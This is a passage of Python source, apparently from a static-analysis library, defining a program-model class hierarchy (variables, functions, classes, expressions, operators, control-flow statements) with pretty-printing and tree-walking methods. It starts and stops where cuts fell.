"""Constructor for variables.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this variable.
name (str): The name of the variable in the program.
result (str): The type of the variable in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id
self.name = name
self.result = result
self.value = None
self.member_of = None
self.references = []
self.writes = []
@property
def is_definition(self):
return True
@property
def is_local(self):
"""Whether this is a local variable.
In general, a variable is *local* if its containing scope is a
statement (e.g. a block), or a function, given that the variable
is not one of the function's parameters.
"""
return (isinstance(self.scope, CodeStatement)
or (isinstance(self.scope, CodeFunction)
and self not in self.scope.parameters))
@property
def is_global(self):
"""Whether this is a global variable.
In general, a variable is *global* if it is declared directly under
the program's global scope or a namespace.
"""
return isinstance(self.scope, (CodeGlobalScope, CodeNamespace))
@property
def is_parameter(self):
"""Whether this is a function parameter."""
return (isinstance(self.scope, CodeFunction)
and self in self.scope.parameters)
@property
def is_member(self):
"""Whether this is a member/attribute of a class or object."""
return isinstance(self.scope, CodeClass)
def _add(self, codeobj):
"""Add a child (value) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.value = codeobj
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.value, CodeEntity):
yield self.value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return '{}{} {} = {}'.format(' ' * indent, self.result, self.name,
pretty_str(self.value))
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {} = ({})'.format(self.result, self.name, self.value)
class CodeFunction(CodeEntity, CodeStatementGroup):
"""This class represents a program function.
A function typically has a name, a return type (`result`), a list
of parameters and a body (a code block). It also has an unique `id`
that identifies it in the program and a list of references to it.
If a function is a method of some class, its `member_of` should be
set to the corresponding class.
"""
def __init__(self, scope, parent, id, name, result, definition=True):
"""Constructor for functions.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this function.
name (str): The name of the function in the program.
result (str): The return type of the function in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id
self.name = name
self.result = result
self.parameters = []
self.body = CodeBlock(self, self, explicit=True)
self.member_of = None
self.references = []
self._definition = self if definition else None
@property
def is_definition(self):
"""Whether this is a function definition or just a declaration."""
return self._definition is self
@property
def is_constructor(self):
"""Whether this function is a class constructor."""
return self.member_of is not None
def _add(self, codeobj):
"""Add a child (statement) to this object."""
assert isinstance(codeobj, (CodeStatement, CodeExpression))
self.body._add(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.parameters:
yield codeobj
for codeobj in self.body._children():
yield codeobj
def _afterpass(self):
"""Assign a function-local index to each child object and register
write operations to variables.
This should only be called after the object is fully built.
"""
if hasattr(self, '_fi'):
return
fi = 0
for codeobj in self.walk_preorder():
codeobj._fi = fi
fi += 1
if isinstance(codeobj, CodeOperator) and codeobj.is_assignment:
if codeobj.arguments and isinstance(codeobj.arguments[0],
CodeReference):
var = codeobj.arguments[0].reference
if isinstance(var, CodeVariable):
var.writes.append(codeobj)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
params = ', '.join(map(lambda p: p.result + ' ' + p.name,
self.parameters))
if self.is_constructor:
pretty = '{}{}({}):\n'.format(spaces, self.name, params)
else:
pretty = '{}{} {}({}):\n'.format(spaces, self.result,
self.name, params)
if self._definition is not self:
pretty += spaces + ' [declaration]'
else:
pretty += self.body.pretty_str(indent + 2)
return pretty
def __repr__(self):
"""Return a string representation of this object."""
params = ', '.join(map(str, self.parameters))
return '[{}] {}({})'.format(self.result, self.name, params)
class CodeClass(CodeEntity):
"""This class represents a program class for object-oriented languages.
A class typically has a name, an unique `id`, a list of
members (variables, functions), a list of superclasses, and a list of
references.
If a class is defined within another class (inner class), it should
have its `member_of` set to the corresponding class.
"""
def __init__(self, scope, parent, id_, name, definition=True):
"""Constructor for classes.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this class.
name (str): The name of the class in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id_
self.name = name
self.members = []
self.superclasses = []
self.member_of = None
self.references = []
self._definition = self if definition else None
@property
def is_definition(self):
"""Whether this is a definition or a declaration of the class."""
return self._definition is self
def _add(self, codeobj):
"""Add a child (function, variable, class) to this object."""
assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass))
self.members.append(codeobj)
codeobj.member_of = self
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.members:
yield codeobj
def _afterpass(self):
"""Assign the `member_of` of child members and call
their `_afterpass()`.
This should only be called after the object is fully built.
"""
for codeobj in self.members:
if not codeobj.is_definition:
if not codeobj._definition is None:
codeobj._definition.member_of = self
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = spaces + 'class ' + self.name
if self.superclasses:
superclasses = ', '.join(self.superclasses)
pretty += '(' + superclasses + ')'
pretty += ':\n'
if self.members:
pretty += '\n\n'.join(
c.pretty_str(indent + 2)
for c in self.members
)
else:
pretty += spaces + ' [declaration]'
return pretty
def __repr__(self):
"""Return a string representation of this object."""
return '[class {}]'.format(self.name)
class CodeNamespace(CodeEntity):
"""This class represents a program namespace.
A namespace is a concept that is explicit in languages such as C++,
but less explicit in many others. In Python, the closest thing should
be a module. In Java, it may be the same as a class, or non-existent.
A namespace typically has a name and a list of children objects
(variables, functions or classes).
"""
def __init__(self, scope, parent, name):
"""Constructor for namespaces.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the namespace in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.name = name
self.children = []
def _add(self, codeobj):
"""Add a child (namespace, function, variable, class) to this object."""
assert isinstance(codeobj, (CodeNamespace, CodeClass,
CodeFunction, CodeVariable))
self.children.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.children:
yield codeobj
def _afterpass(self):
"""Call the `_afterpass()` of child objects.
This should only be called after the object is fully built.
"""
for codeobj in self.children:
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = '{}namespace {}:\n'.format(spaces, self.name)
pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children)
return pretty
def __repr__(self):
"""Return a string representation of this object."""
return '[namespace {}]'.format(self.name)
class CodeGlobalScope(CodeEntity):
"""This class represents the global scope of a program.
The global scope is the root object of a program. If there are no
better candidates, it is the `scope` and `parent` of all other objects.
It is also the only object that does not have a `scope` or `parent`.
"""
def __init__(self):
"""Constructor for global scope objects."""
CodeEntity.__init__(self, None, None)
self.children = []
def _add(self, codeobj):
"""Add a child (namespace, function, variable, class) to this object."""
assert isinstance(codeobj, (CodeNamespace, CodeClass,
CodeFunction, CodeVariable))
self.children.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.children:
yield codeobj
def _afterpass(self):
"""Call the `_afterpass()` of child objects.
This should only be called after the object is fully built.
"""
for codeobj in self.children:
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return '\n\n'.join(
codeobj.pretty_str(indent=indent)
for codeobj in self.children
)
# ----- Expression Entities ---------------------------------------------------
class CodeExpression(CodeEntity):
"""Base class for expressions within a program.
Expressions can be of many types, including literal values,
operators, references and function calls. This class is meant
to be inherited from, and not instantiated directly.
An expression typically has a name (e.g. the name of the function
in a function call) and a type (`result`). Also, an expression should
indicate whether it is enclosed in parentheses.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for expressions.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the expression in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeEntity.__init__(self, scope, parent)
self.name = name
self.result = result
self.parenthesis = paren
@property
def function(self):
"""The function where this expression occurs."""
return self._lookup_parent(CodeFunction)
@property
def statement(self):
"""The statement where this expression occurs."""
return self._lookup_parent(CodeStatement)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.parenthesis:
return (' ' * indent) + '(' + self.name + ')'
return (' ' * indent) + self.name
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {}'.format(self.result, self.name)
class SomeValue(CodeExpression):
"""This class represents an unknown value for diverse primitive types."""
def __init__(self, result):
"""Constructor for unknown values."""
CodeExpression.__init__(self, None, None, result, result)
def _children(self):
"""Yield all the children of this object, that is no children."""
return iter(())
SomeValue.INTEGER = SomeValue("int")
SomeValue.FLOATING = SomeValue("float")
SomeValue.CHARACTER = SomeValue("char")
SomeValue.STRING = SomeValue("string")
SomeValue.BOOL = SomeValue("bool")
class CodeLiteral(CodeExpression):
"""Base class for literal types not present in Python.
This class is meant to represent a literal whose type is not numeric,
string or boolean, as bare Python literals are used for those.
A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`),
and could be enclosed in parentheses. It does not have a name.
"""
def __init__(self, scope, parent, value, result, paren=False):
"""Constructor for literals.
As literals have no name, a constant string is used instead.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
value (CodeExpression|CodeExpression[]): This literal's value.
result (str): The return type of the literal in the program.
Kwargs:
paren (bool): Whether the literal is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, 'literal', result, paren)
self.value = value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.parenthesis:
return '{}({})'.format(' ' * indent, pretty_str(self.value))
return pretty_str(self.value, indent=indent)
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {!r}'.format(self.result, self.value)
CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue,
CodeLiteral, CodeExpression)
CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral)
class CodeNull(CodeLiteral):
"""This class represents an indefinite value.
Many programming languages have their own version of this concept:
Java has null references, C/C++ NULL pointers, Python None and so on.
"""
def __init__(self, scope, parent, paren=False):
"""Constructor for null literals.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
paren (bool): Whether the null literal is enclosed in parentheses.
"""
CodeLiteral.__init__(self, scope, parent, None, 'null', paren)
def _children(self):
"""Yield all the children of this object, that is no children.
This class inherits from CodeLiteral just for consistency with the
class hierarchy. It should have no children, thus an empty iterator
is returned.
"""
return iter(())
class CodeCompositeLiteral(CodeLiteral):
"""This class represents a composite literal.
A composite literal is any type of literal whose value is compound,
rather than simple. An example present in many programming languages
are list literals, often constructed as `[1, 2, 3]`.
A composite literal has a sequence of values that compose it
(`values`), a type (`result`), and it should indicate whether it is
enclosed in parentheses.
"""
def __init__(self, scope, parent, result, value=(), paren=False):
"""Constructor for a compound literal.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
value (iterable): The initial value sequence in this composition.
result (str): The return type of the literal in the program.
Kwargs:
paren (bool): Whether the literal is enclosed in parentheses.
"""
try:
value = list(value)
except TypeError as te:
raise AssertionError(str(te))
CodeLiteral.__init__(self, scope, parent, value, result, paren)
@property
def values(self):
return tuple(self.value)
def _add_value(self, child):
"""Add a value to the sequence in this composition."""
self.value.append(child)
def _children(self):
"""Yield all direct children of this object."""
for value in self.value:
if isinstance(value, CodeEntity):
yield value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
values = '{{{}}}'.format(', '.join(map(pretty_str, self.value)))
if self.parenthesis:
return '{}({})'.format(indent, values)
return '{}{}'.format(indent, values)
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {{{}}}'.format(self.result,
', '.join(map(repr, self.value)))
class CodeReference(CodeExpression):
"""This class represents a reference expression (e.g. to a variable).
A reference typically has a name (of what it is referencing),
and a return type.
If the referenced entity is known, `reference` should be set.
If the reference is a field/attribute of an object, `field_of`
should be set to that object.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for references.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the reference in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the reference is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.field_of = None
self.reference = None
def _set_field(self, codeobj):
"""Set the object that contains the attribute this is a reference of."""
assert isinstance(codeobj, CodeExpression)
self.field_of = codeobj
def _children(self):
"""Yield all direct children of this object."""
if self.field_of:
yield self.field_of
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
name = ('{}.{}'.format(self.field_of.pretty_str(), self.name)
if self.field_of else self.name)
return pretty.format(spaces, name)
def __str__(self):
"""Return a string representation of this object."""
return '#' + self.name
def __repr__(self):
"""Return a string representation of this object."""
if self.field_of:
return '[{}] ({}).{}'.format(self.result, self.field_of, self.name)
return '[{}] #{}'.format(self.result, self.name)
class CodeOperator(CodeExpression):
"""This class represents an operator expression (e.g. `a + b`).
Operators can be unary or binary, and often return numbers
or booleans. Some languages also support ternary operators.
Do note that assignments are often considered expressions,
and, as such, assignment operators are included here.
An operator typically has a name (its token), a return type,
and a tuple of its arguments.
"""
_UNARY_TOKENS = ("+", "-")
_BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=",
"==", "!=", "&&", "||", "=")
def __init__(self, scope, parent, name, result, args=None, paren=False):
"""Constructor for operators.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the operator in the program.
result (str): The return type of the operator in the program.
Kwargs:
args (tuple): Initial tuple of arguments.
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.arguments = args or ()
@property
def is_unary(self):
"""Whether this is a unary operator."""
return len(self.arguments) == 1
@property
def is_binary(self):
"""Whether this is a binary operator."""
return len(self.arguments) == 2
@property
def is_ternary(self):
"""Whether this is a ternary operator."""
return len(self.arguments) == 3
@property
def is_assignment(self):
"""Whether this is an assignment operator."""
return self.name == "="
def _add(self, codeobj):
"""Add a child (argument) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.arguments = self.arguments + (codeobj,)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.arguments:
if isinstance(codeobj, CodeExpression):
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
if self.is_unary:
operator = self.name + pretty_str(self.arguments[0])
else:
operator = '{} {} {}'.format(pretty_str(self.arguments[0]),
self.name,
pretty_str(self.arguments[1]))
return pretty.format(indent, operator)
def __repr__(self):
"""Return a string representation of this object."""
if self.is_unary:
return '[{}] {}({})'.format(self.result, self.name,
self.arguments[0])
if self.is_binary:
return '[{}] ({}){}({})'.format(self.result, self.arguments[0],
self.name, self.arguments[1])
return '[{}] {}'.format(self.result, self.name)
class CodeFunctionCall(CodeExpression):
"""This class represents a function call.
A function call typically has a name (of the called function),
a return type, a tuple of its arguments and a reference to the
called function.
If a call references a class method, its `method_of` should be
set to the object on which a method is being called.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for function calls.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the function in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.full_name = name
self.arguments = ()
self.method_of = None
self.reference = None
@property
def is_constructor(self):
"""Whether the called function is a constructor."""
return self.result == self.name
def _add(self, codeobj):
"""Add a child (argument) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.arguments = self.arguments + (codeobj,)
def _set_method(self, codeobj):
"""Set the object on which a method is called."""
assert isinstance(codeobj, CodeExpression)
self.method_of = codeobj
def _children(self):
"""Yield all direct children of this object."""
if self.method_of:
yield self.method_of
for codeobj in self.arguments:
if isinstance(codeobj, CodeExpression):
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
args = ', '.join(map(pretty_str, self.arguments))
if self.method_of:
call = '{}.{}({})'.format(self.method_of.pretty_str(),
self.name, args)
elif self.is_constructor:
call = 'new {}({})'.format(self.name, args)
else:
call = '{}({})'.format(self.name, args)
return pretty.format(indent, call)
def __repr__(self):
"""Return a string representation of this object."""
args = ', '.join(map(str, self.arguments))
if self.is_constructor:
return '[{}] new {}({})'.format(self.result, self.name, args)
if self.method_of:
return '[{}] {}.{}({})'.format(self.result, self.method_of.name,
self.name, args)
return '[{}] {}({})'.format(self.result, self.name, args)
class CodeDefaultArgument(CodeExpression):
"""This class represents a default argument.
Some languages, such as C++, allow function parameters to have
default values when not explicitly provided by the programmer.
This class represents such omitted arguments.
A default argument has only a return type.
"""
def __init__(self, scope, parent, result):
"""Constructor for default arguments.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
result (str): The return type of the argument in the program.
"""
CodeExpression.__init__(self, scope, parent, '(default)', result)
# ----- Statement Entities ----------------------------------------------------
class CodeStatement(CodeEntity):
"""Base class for program statements.
Programming languages often define diverse types of statements
(e.g. return statements, control flow, etc.).
This class provides common functionality for such statements.
In many languages, statements must be contained within a function.
An operator typically has a name (its token), a return type,
and a tuple of its arguments.
"""
def __init__(self, scope, parent):
"""Constructor for statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeEntity.__init__(self, scope, parent)
self._si = -1
@property
def function(self):
"""The function where this statement appears in."""
return self._lookup_parent(CodeFunction)
class CodeJumpStatement(CodeStatement):
"""This class represents a jump statement (e.g. `return`, `break`).
A jump statement has a name. In some cases, it may also have an
associated value (e.g. `return 0`).
"""
def __init__(self, scope, parent, name):
"""Constructor for jump statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the statement in the program.
"""
CodeStatement.__init__(self, scope, parent)
self.name = name
self.value = None
def _add(self, codeobj):
"""Add a child (value) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.value = codeobj
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.value, CodeExpression):
yield self.value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
if self.value is not None:
return '{}{} {}'.format(indent, self.name, pretty_str(self.value))
return indent + self.name
def __repr__(self):
"""Return a string representation of this object."""
if self.value is not None:
return '{} {}'.format(self.name, str(self.value))
return self.name
class CodeExpressionStatement(CodeStatement):
"""This class represents an expression statement. It is only a wrapper.
Many programming languages allow expressions to be statements
on their own. A common example is the assignment operator, which
can be a statement on its own, but also returns a value when
contained within a larger expression.
"""
def __init__(self, scope, parent, expression=None):
"""Constructor for expression statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
expression (CodeExpression): The expression of this statement.
"""
CodeStatement.__init__(self, scope, parent)
self.expression = expression
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.expression, CodeExpression):
yield self.expression
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return pretty_str(self.expression, indent=indent)
def __repr__(self):
"""Return a string representation of this object."""
return repr(self.expression)
class CodeBlock(CodeStatement, CodeStatementGroup):
"""This class represents a code block (e.g. `{}` in C, C++, Java, etc.).
Blocks are little more than collections of statements, while being
considered a statement themselves.
Some languages allow blocks to be implicit in some contexts, e.g.
an `if` statement omitting curly braces in C, C++, Java, etc.
This model assumes that control flow branches and functions always
have a block as their body.
"""
def __init__(self, scope, parent, explicit=True):
"""Constructor for code blocks.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
explicit (bool): Whether the block is explicit in the code.
"""
CodeStatement.__init__(self, scope, parent)
self.body = []
self.explicit = explicit
def statement(self, i):
"""Return the *i*-th statement of this block."""
return self.body[i]
def _add(self, codeobj):
"""Add a child (statement) to this object."""
assert isinstance(codeobj, CodeStatement)
codeobj._si = len(self.body)
self.body.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.body:
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.body:
return '\n'.join(stmt.pretty_str(indent) for stmt in self.body)
else:
return (' ' * indent) + '[empty]'
def __repr__(self):
"""Return a string representation of this object."""
return str(self.body)
class CodeDeclaration(CodeStatement):
"""This class represents a declaration statement.
Some languages, such as C, C++ or Java, consider this special
kind of statement for declaring variables within a function,
for instance.
A declaration statement contains a list of all declared variables.
"""
def __init__(self, scope, parent):
"""Constructor for declaration statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeStatement.__init__(self, scope, parent)
self.variables = []
def _add(self, codeobj):
"""Add a child (variable) to this object."""
assert isinstance(codeobj, CodeVariable)
self.variables.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.variables:
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
return spaces + ', '.join(v.pretty_str() for v in self.variables)
def __repr__(self):
"""Return a string representation of this object."""
return str(self.variables)
class CodeControlFlow(CodeStatement, CodeStatementGroup):
"""Base class for control flow structures (e.g. `for` loops).
Control flow statements are assumed to have, at least, one branch
(a boolean condition and a `CodeBlock` that is executed when
the condition is met). Specific implementations may consider
more branches, or default branches (executed when no condition is met).
A control flow statement typically has a name.
"""
def __init__(self, scope, parent, name):
"""Constructor for control flow structures.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the control flow statement in the program.
"""
CodeStatement.__init__(self, scope, parent)
self.name = name
self.condition = True
self.body = CodeBlock(scope, self, explicit=False)
def get_branches(self):
"""Return a list of branches, where each branch is a pair of
condition and respective body."""
return [(self.condition, self.body)]
def _set_condition(self, condition):
"""Set the condition for this control flow structure."""
assert isinstance(condition, CodeExpression.TYPES)
self.condition = condition
def _set_body(self, body):
"""Set the main body for this control flow structure."""
assert isinstance(body, CodeStatement)
if isinstance(body, CodeBlock):
self.body = body
else:
self.body._add(body)
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.condition, CodeExpression):
yield self.condition
for codeobj in self.body._children():
yield codeobj
def __repr__(self):
"""Return a string representation of this object."""
return '{} {}'.format(self.name, self.get_branches())
class CodeConditional(CodeControlFlow):
"""This class represents a conditional (`if`).
A conditional is allowed to have a default branch (the `else` branch),
besides its mandatory one.
"""
def __init__(self, scope, parent):
"""Constructor for conditionals.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeControlFlow.__init__(self, scope, parent, 'if')
self.else_body = CodeBlock(scope, self, explicit=False)
@property
def then_branch(self):
"""The branch associated with a condition."""
return self.condition, self.body
@property
def else_branch(self):
"""The default branch of the conditional."""
return True, self.else_body
def statement(self, i):
"""Return the *i*-th statement of this block.
Behaves as if the *then* and *else* branches were
concatenated, for indexing purposes.
"""
# ----- This code is just to avoid creating a new list and
# returning a custom exception message.
o = len(self.body)
n = o + len(self.else_body)
if i >= 0 and i < n:
if i < o:
return self.body.statement(i)
return self.else_body.statement(i - o)
elif i < 0 and i >= -n:
if i >= o - n:
return self.else_body.statement(i)
return self.body.statement(i - o + n)
raise IndexError('statement index out of range')
def statement_after(self, i):
"""Return the statement after the *i*-th one, or `None`."""
k = i + 1
o = len(self.body)
n = o + len(self.else_body)
if k > 0:
if k < o:
return self.body.statement(k)
if k > o and k < n:
return self.else_body.statement(k)
if k < 0:
if k < o - n and k > -n:
return self.body.statement(k)
if k > o - n:
return self.else_body.statement(k)
return None
def get_branches(self):
"""Return a list with the conditional branch and the default branch."""
if self.else_branch:
return [self.then_branch, self.else_branch]
return [self.then_branch]
def _add_default_branch(self, body):
"""Add a default body for this conditional (the `else` branch)."""
assert isinstance(body, CodeStatement)
if isinstance(body, CodeBlock):
self.else_body = body
else:
self.else_body._add(body)
def __len__(self):
"""Return the length of both branches combined."""
return len(self.body) + len(self.else_body)
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.condition, CodeExpression):
yield self.condition
for codeobj in self.body._children():
yield codeobj
for codeobj in self.else_body._children():
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
pretty = '{}if ({}):\n'.format(spaces, condition)
pretty += self.body.pretty_str(indent=indent + 2)
if self.else_body:
pretty += '\n{}else:\n'.format(spaces)
pretty += self.else_body.pretty_str(indent=indent + 2)
return pretty
class CodeLoop(CodeControlFlow):
"""This class represents a loop (e.g. `while`, `for`).
Some languages allow loops to define local declarations, as well
as an increment statement.
A loop has only a single branch, its condition plus the body
that should be repeated while the condition holds.
"""
def __init__(self, scope, parent, name):
"""Constructor for loops.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the loop statement in the program.
"""
CodeControlFlow.__init__(self, scope, parent, name)
self.declarations = None
self.increment = None
def _set_declarations(self, declarations):
"""Set declarations local to this loop (e.g. `for` variables)."""
assert isinstance(declarations, CodeStatement)
self.declarations = declarations
declarations.scope = self.body
def _set_increment(self, statement):
"""Set the increment statement for this loop (e.g. in a `for`)."""
assert isinstance(statement, CodeStatement)
self.increment = statement
statement.scope = self.body
def _children(self):
"""Yield all direct children of this object."""
if self.declarations:
yield self.declarations
if isinstance(self.condition, CodeExpression):
yield self.condition
if self.increment:
yield self.increment
for codeobj in self.body._children():
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
v = self.declarations.pretty_str() if self.declarations else ''
i = self.increment.pretty_str(indent=1) if self.increment else ''
pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i)
pretty += self.body.pretty_str(indent=indent + 2)
return pretty
class CodeSwitch(CodeControlFlow):
"""This class represents a switch statement.
A switch evaluates a value (its `condition`) and then declares
at least one branch (*cases*) that execute when the evaluated value
is equal to the branch value. It may also have a default branch.
Switches are often one of the most complex constructs of programming
languages, so this implementation might be lackluster.
"""
def __init__(self, scope, parent):
"""Constructor for switches.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeControlFlow.__init__(self, scope, parent, "switch")
self.cases = []
self.default_case = None
def _add_branch(self, value, statement):
"""Add a branch/case (value and statement) to this switch."""
self.cases.append((value, statement))
def _add_default_branch(self, statement):
"""Add a default branch to this switch."""
self.default_case = statement
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
pretty = '{}switch ({}):\n'.format(spaces, condition)
pretty += self.body.pretty_str(indent=indent + 2)
return pretty
class CodeTryBlock(CodeStatement, CodeStatementGroup):
"""This class represents a try-catch block statement.
`try` blocks have a main body of statements, just like regular blocks.
Multiple `catch` blocks may be defined to handle specific types of
exceptions.
Some languages also allow a `finally` block that is executed after
the other blocks (either the `try` block, or a `catch` block, when
an exception is raised and handled).
"""
def __init__(self, scope, parent):
"""Constructor for try block structures.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeStatement.__init__(self, scope, parent)
self.body = CodeBlock(scope, self, explicit=True)
self.catches = []
self.finally_body = CodeBlock(scope, self, explicit=True)
def _set_body(self, body):
"""Set the main body for try block structure."""
assert isinstance(body, CodeBlock)
self.body = body
def _add_catch(self, catch_block):
"""Add a catch block (exception variable declaration and block)
to this try block structure.
"""
assert isinstance(catch_block, self.CodeCatchBlock)
self.catches.append(catch_block)
def _set_finally_body(self, body):
"""Set the finally body for try block structure."""
assert isinstance(body, CodeBlock)
self.finally_body = body
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.body._children():
yield codeobj
for catch_block in self.catches:
for codeobj in catch_block._children():
yield codeobj
for codeobj in self.finally_body._children():
yield codeobj
def __len__(self):
"""Return the length of all blocks combined."""
n = len(self.body) + len(self.catches) + len(self.finally_body)
n += sum(map(len, self.catches))
return n
def __repr__(self):
"""Return a string representation of this object."""
return 'try {} {} {}'.format(self.body, self.catches,
self.finally_body)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
